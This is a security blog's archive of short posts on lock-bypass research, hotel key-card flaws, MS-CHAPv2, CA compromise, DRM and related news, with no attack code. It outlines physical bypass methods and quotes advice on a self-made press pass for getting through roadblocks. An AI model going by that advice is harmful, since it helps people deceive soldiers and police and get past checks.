Securology's Open Source Repository on GitHub

Securology now has open source code on GitHub!
https://github.com/Securology

This is something we have wanted to do for some time and finally are now able!  As our contributors find the time and freedom to contribute some of our intellectual property back to the greater community at large, we will add more repositories and content there.

Our first offering is a C# .NET wrapper that can do more to manage Microsoft Active Directory instances (including Active Directory Lightweight Directory Services, formerly known as ADAM, or Active Directory Application Mode) than any other open source project can do (which is why we wrote it in the first place).  Our open source Active Directory Services repo is available here:
https://github.com/Securology/ActiveDirectoryServices

In addition to shipping a core library that extends Microsoft's out-of-the-box functionality that ships with the .NET runtime (System.DirectoryServices.AccountManagement), we also have fully working example applications that are consumers of the library, so you can see how to use all of the features we have built.

Here's a list of just some of the features our consumer applications can do:

• Create, Edit, Update, and Delete Active Directory objects Users, Groups, Organizational Units (OUs), Contacts, etc.
• Create, Edit, Update, and Delete AD-LDS (ADAM) UserProxy and UserProxyFull objects.
• Sync AD Users into an AD-LDS (ADAM) instance as UserProxy or UserProxyFull objects.
• Create, Update, Delete, and generally manage/sync dynamic AD security/distribution groups based upon reporting relationships (if those are defined within Active Directory).
• Enable, set, and maintain Microsoft Exchange attributes to enable objects to become visible in the GAL (Global Address List), which also works for Microsoft's Exchange Online hosted service via DirSync.
• Import various rooms and resources from a .CSV file into Active Directory and enable their visibility in the Exchange GAL.
• Enable and Manage Office Communicator/Lync attributes to turn on/off access to your company's Lync/OCS server, setup default policies, including access to any internet-facing proxy servers as well as archive/logging per user.
• Generate random passwords for users.
• A nifty way of "snoozing" when a AD user's password expires while keeping the same password.
• And much more...

Eventually, we will share a working Provisioning Web Service that will be a great solution for limited budget organizations that want some of the functionality Microsoft's Identity Lifecycle Manager (ILM) includes, without the heftier license cost and infrastructure requirements.

More follow-up posts will follow.

Breaking into Kaba Door Locks

This is an older issue that was resolved by an update from the manufacturer, but it's still an interesting story.

Continuing from yesterday, Marc Weber Tobias also was instrumental in getting Kaba to update their Simplex push-button mechanical combination locks.  On those door locks, which have seen near ubiquitous deployment, a mechanical combination is entered into a push-button key pad, which unlocks the door.  Some models include other features, like "bypass" which allows a person inside to egress through the door without pushing the combination.  It's this feature on the Kaba lock that Tobias learned could be defeated with a rare earth magnet.

Here's a (slightly dry) walk through of how the lock is defeated using just a magnet, leaving no forensic evidence of unauthorized entry whatsoever:


One aspect of this story that will be interesting for computer security professionals is the element of "responsible disclosure" used by Tobias to attempt to force the hand of the manufacturer to fix the problem, followed by the manufacturer's all too familiar "there is no such problem" response (yet they did fix it).

Breaking Physical Locks

Recently, Wired Magazine ran an article about just how easy it is for children to break into certain models of gun safes.  Their findings are interesting, but not totally surprising.  Watch for yourself if you haven't already seen it:


We did our own review of pistol safes here, but more or less comparing features of safes, not attempting to penetrate them as the article describes.

One of the researchers, Marc Weber Tobias, has a variety of other very interesting (but dry) videos describing physical lock security and some of the particular products that are defeated.  His YouTube channel is worth a review.

Sony's PS3 DRM Cracked

Anyone who pays any attention to DRM will extrapolate the general principle:

You can never prevent an end-user who has physical control of a device from breaking any DRM scheme you can invent.

Sony just learned their DRM lesson (again).  I'm sure that people at Sony already know this principle, but some "suit" tells the engineers to "do something about the problem" so they implement a technical speed bump. That's all it is and will ever be.

Skeleton Keys

Wouldn't it be really scary if physical locks in large planned cities like NYC were designed to use skeleton keys-- master keys that are shared with do-gooder firefighters and locksmiths alike-- without ever thinking what could happen if such keys got into realm of the average Joe, whose do-gooder status was unknown?  Yep it would.

Look but don't pay attention to key teeth details!

Wouldn't it be even scarier if those who cried "the sky is falling, the sky is falling" also were dumb enough to post high res photos of the skeleton keys on their websites (pictured left) so that anyone with access to key blanks and tools could easily measure and create their own skeleton key copies?  Again, yes.

Picking Handcuffs

Because you never know when you just might need to have this skill:

Finally a Safe Hello World

It's very common for Hello World example apps in textbooks or other educational literature to promote insecure software building practices right out of the gate.  What a breath of fresh air to see the Microsoft MVC folks safely HTML encoding (to avoid XSS) in their MVC4 Hello World application!

Coping with Compromised Certificate Authorities

With the news containing stories of malware distributing via compromised Certificate Authorities, it makes sense that some IT Security blogs would address "what to do" if this happens to your CA.  This blog post gets it wrong, though:

What would you do if you found out that the Certificate Authority that provides Digital Certificates to your company was compromised, and Microsoft was adding the Certificate Authority’s public key to Windows un-trusted Root Store? Well if you have not got a contingency plan to implement then I can presume you will be in a panic to purchase new certificates from another Certificate Authority... It can take Certificate Authority’s (CA’s) a few days to validate domain ownership and company registration details... While all this is happening your customers are getting a message from Internet Explorer that your SSL certificate is not to be trusted.

What can you do?

• Do not rely on one Certificate Authority for all of your certificates. You should have a relationship with at least two well known Certificate Authority’s and the CA’s should have validated all of your domains. This will let you quickly order Digital Certificates from the second CA without having to go through the company validation process...
• If you cannot tolerate any downtime for a service you can take the extra step in which you create backup certificates for each service using your backup Certificate Authority. This will enable you to implement the backup certificates without having to contact the second CA and joining the queue of company’s looking for new certificates.

Keep in mind that the worst-case scenario described above would require the Root CA Certificate to be compromised.  Most Root CAs are offline certs, meaning the computers that house them are not powered on except during special circumstances when new intermediate CA certificates are generated, OR, they are online in an "air gap" (disconnected from the internet) network accessible only via sneakernet.  Exploiting an offline CA is a big deal, and if it occurs it won't be just your organization that is affected, but likely a large part of the entire internet.

So a much more plausible option:

• The CA will just create a new intermediate CA cert and re-issue client certs to all of its paying customers.

In other words: nothing to see here, please move along.

Vauban Star Fortifications

Bourtange Star Shaped Fort

Taking a blast from the past that still has some application in today's physical security landscape ...  Star Shaped Forts using the Vauban (military engineering) Principle.

Acute angles on the corners of a building are added to the architectural design to eliminate "dead zones" in which an adversary could hide or take refuge.  At the time of star shaped fortifications, all of the competing designs employed rounded towers or turrets at each corner, typically to house archers.  As a breaching force approached the rounded corner, they were able to hide from the archers using the fortifications intended to be an asset in favor of the defenders.

Acute angles, however, prevented the breaching force from seeking shelter along the very walls intended to shelter the defenders.  [See the illustration, below right.]

Modern applications against a well equipped modern adversary are very limited, since "air support" ruined traditional fort designs (adversaries can simply rain fire from above).  However, against a low tech insurgency, the classic star design still prevails.

There are also applications for the acute corners in modern civil architecture.

For example, an HVT (High Value Target) person, such as a celebrity, bank CEO, or anyone else that might typically employ a Private Security Detail, these corners help to deter snatch-and-grab and similar attacks by simply limiting the avenues of approach.  Col Jeff Cooper, famous for dealing with small arms fire, had a fascination with these acute angles to the extent that the term "Cooper Corners" was coined referring to this much older design.

In public civil architecture, there are obvious applications in places such as bank vaults, manufacturing facilities where the likelihood of espionage is high, and even public restrooms in semi-remote and semi-private, yet public places like city parks, where the likelihood of an after dark robbery or rape assault is high.  In the case of the park (along with a well designed layout of lighting, landscaping, and shrubbery) the acute angles may be just the trick to eliminate lie-in-wait hiding places.

The next time you are tasked with securing a high value asset at a physical location, being familiar with the acute angles of the Medieval star fort might be the exact tool you need to pull out of your security toolbox.

Avoiding Protests with a DIY Press Pass

Do you live in an area that is likely to have civil unrest and protests?  Perhaps having a Press Pass may get you out of trouble.  ITS Tactical ran an article on just how to do this.

An excerpt:

Protesting is About Attention! Use that to your advantage. Protesters love the press. It can be a relatively simple proposition to get a press pass that will get you through/past protests that completely block traffic. Afterwards, ask them for a letter stating you have written for them, etc.

• Set up a blog using a free service like Blogger or WordPress.

• Write an “About” page or article telling people that this blog is for covering local protests or demonstrations

• Design your own press ID using a template (Here’s an example template). Don’t lie on the pass. It’s not necessary.

• Print it on a solid plastic card. There are tons of companies that will do this for a few bucks. (Here are a few) I had mine printed locally for  about $.80 each.

• Throw the ID on a lanyard or in an ID armband and stash it in the glove compartment for whenever you may need it.

• If you have to use it, present it with authority!  It has never failed me, even under the scrutiny of armed soldiers at roadblocks.

Destroying Paper Documents

The folks over at ITS Tactical have an interesting article on securely disposing paper documents.

Here is an excerpt:

Reconstruction

The reconstruction of sensitive documentation has been around as long as shredders have. According to a fantastic NY Time article that everyone should read, reconstruction was first brought to light during the 1979 US Embassy takeover in Tehran. The Iranians elicited the help of local carpet weavers to reconstruct sensitive documents, which were sold on the streets of Tehran as a testament to US imperialism.

Just know that with some time and even the help of computer programs like Unshredder, there isn’t much reassurance that your documents will stay shredded.

Document Burn Bag

ITS Tactical also sells "Burn Bags" for important documents (or shreddings from documents) at a reasonable price, just like the kind you'd find at government agencies or in the movies.

XKCD Password Strength

Lock Kill

Do you have a house/door key lock that you no longer want somebody to have the ability to unlock, but you don't have time to change the locks?  Maybe you're a landlord?  Or maybe you have some hidden purpose, such as forcing door traffic to a different entry to the building?

LockKill has a solution: a specialty key designed to slip in, bypass tumblers long enough to get all the way set, and then sheer off in place, destroying the lock.  It only takes a few seconds.

Warning: the only real way of bringing that lock back from the dead is to replace it.

Watch the review by ITS Tactical:

Cognitive Side Channels

A recent media buzz this week involves so-called "side channel" attacks or leakages of information from human brain to computer interfaces.  Not a ubiquitous technology today, but quite possibly down the road.

Essentially the attacks follow the lines of showing a plugged-in subject a bank, in which case the subject's mind races down the neural paths for things like account numbers, PINs, maybe balances or recent expenditures, etc.  And the mere thoughts picked up by the device can capture these otherwise private thoughts inside the subject's brain.

Sound scary?  It is.  The brain wasn't designed to keep information from itself.  Count us out of the "early adopter program".

Reminds us of the time the Ghostbusters were told the worst thing they could think of would be their next enemy:

Protecting Cars from Viruses

Reuters is running a story that should amuse any computer security professional: Experts hope to shield cars from computer viruses.

An excerpt:

Intel's McAfee unit, which is best known for software that fights PC viruses, is one of a handful of firms that are looking to protect the dozens of tiny computers and electronic communications systems that are built into every modern car.

It's scary business. Security experts say that automakers have so far failed to adequately protect these systems, leaving them vulnerable to hacks by attackers looking to steal cars, eavesdrop on conversations, or even harm passengers by causing vehicles to crash.

Our guess is that when cars get to the point that they drive themselves, those who understand how malware works-- and more important: how undeniably complicated modern software and its hardware architecture can be-- will start donning a pair of Converse Chuck Taylors and resemble a modern Luddite by driving themselves, a la Will Smith in I, Robot.

When you look at the statistics, you are far more likely to get injured or die in a car accident than you are in nearly any other security risk you face in your daily life.  Even with the vast skies being what they are, and the regulations on the airlines industry and their pilots, it's not possible to keep air travel 100% safe, though it's safer than driving (once you get past the TSA checkpoint).

Computerized, self-driving cars may improve (emphasis on "may") safety stats; however, not if their software landscape looks like anything else we operate with a CPU in it these days.  There are agencies with an operating budget larger than the GDP of several nations that are terrified about the possibility of malware injected into things like military aircraft or missile guidance systems.  Given that, how in the world is an automobile for ~$20K (which is at most 1% of the price tag of the military's concerns) ever going to be 100% free of malware?  Simple: it won't be.

Toyota Motor Corp, the world's biggest automaker, said it was not aware of any hacking incidents on its cars.

"They're basically designed to change coding constantly. I won't say it's impossible to hack, but it's pretty close," said Toyota spokesman John Hanson. [emphasis ours]

Oh, we've never heard that before...

Officials with Hyundai Motor Co, Nissan Motor Co and Volkswagen AG said they could not immediately comment on the issue.

A spokesman for Honda Motor Co said that the Japanese automaker was studying the security of on-vehicle computer systems, but declined to discuss those efforts.

Mums the word is a much smarter response to the press.

A spokesman for the U.S. Department of Homeland Security declined to comment when asked how seriously the agency considers the risk that hackers could launch attacks on vehicles or say whether DHS had learned of any such incidents.

They probably declined to comment because they are working on exploits for these as well.  Say it ain't so?  Look no further than Stuxnet and Flame, of which the US Gov takes full authorship credits.  It's the future of the "cyberwarfarestate".

We can't keep malware out of critical infrastructure SCADA systems.  There's no way we can keep it out of your mom's minivan.

Classic Trust

Ken Thompson is on the left. That's not Adam Savage on the right.

If you work in computer security or software development, and you have never read Unix co-creator Ken Thompson's original 1984 speech "Reflections on Trusting Trust" then you are hereby obliged to at least read the following snippet for today's history lesson, which is just as relevant-- actually more so-- today:

The moral is obvious. You can't trust code that you did not totally create yourself. (Especially code from companies that employ people like me.) No amount of source-level verification or scrutiny will protect you from using untrusted code. In demonstrating the possibility of this kind of attack, I picked on the C compiler. I could have picked on any program-handling program such as an assembler, a loader, or even hardware microcode. As the level of program gets lower, these bugs will be harder and harder to detect. A well installed microcode bug will be almost impossible to detect.

Ken was referring to the trojan modifications he embedded into the C compiler, illustrating that you need to rely on more that source code, but the compiler, the assember, the loader, all the way down to the instruction sets of the CPUs.  Or as Schneier famously pitched: "security is a chain; only as strong as its weakest link".

Who operates on a completely self-built system from software to hardware?  We would venture to say: nary a soul.

Just a good reminder for a random Thursday, in case you forgot.

Hacking Hotels

Breaking into a hotel room with less than $50 in hardware

The technical security media has been all abuzz about a recent Black Hat presentation by Cody Brocious on hacking electronic hotel door locks.

The original author's documentation including the paper and slides are here.

Here's the simplified version:

• The vendor of the locks has an overwhelming majority of the market in the U.S. (chances are you stayed in a room that had this exact lock on it)
• The key cards use crypto for implementing the access control
• The mathematical aspect of the crypto is more or less fine (as is usually the case)
• The problem comes in managing keys (which is pretty much always the problem!)
• An administrative feature is easily exploited-- which is only slightly better than vendors shipping products with widely-known default passwords.
• An administrative maintenance device, when connected, can extract the crypto key and break the access control
• You can roll-you-own maintenance device on the very, very cheap
• Yes, this probably looks like a scene in any random Hollywood movie
• This will likely be a majorly expensive pain to fix for the vendor and hotels
• "Compensating controls" in this case include surveillance cameras, internal dead bolt manual locks, et al

MS-CHAPv2 Crack

It should come as no real surprise: MS-CHAPv2 is broken.  It's an ancient scheme.  If you were paying attention, you would have migrated your VPNs and Wireless networks away from it years ago anyway.

Here's a great break down of what this means to your wireless networks.

An even simpler one is to just note that these combinations are still fine:

• IPSEC and OpenVPNs are fine.
• WPA2 Enterprise wireless with PEAP is fine.
• WPA2 Non-Enterprise (i.e. home) wireless is fine (from this).

And, of course, keep in mind it still takes 24 hours (right now, but that's sure to be sped up) to actually crack the DES encryption key with this exploit.  Since it's 24 hours and not 24 ms, that means an attacker will more than just casually find you and exploit you.  Your network will have to be a target first, at least to some degree.

Skype Leak

Skype has had its moments in security history over the past several years, like the allegations that governments of certain countries have backdoors (not substantiating or denying those here), but now it appears that if you know a Skype username, you can find out the IP address of the user.  Wow.

Chances of Dying (InfoGraphic)

This is an interesting infographic that is floating around that depicts the statistical likelihood of dying from any given event.

It's a commonly known fact that societies tend to focus irrationally on certain threats over realistic ones, and this infographic just might help dispel some irrational fears that you hold.

For example, I was surprised to see that skydiving is less risky behavior than driving a car in traffic, which I do quite regularly.  Looks like it may even be roughly as dangerous as flying commercially (well, except you probably won't have to deal with the TSA when you get on that prop plane at a small rural airport prepping for your skydive).

Note how dangerous any mountaineering is in Nepal.  Ouch.  Not great odds.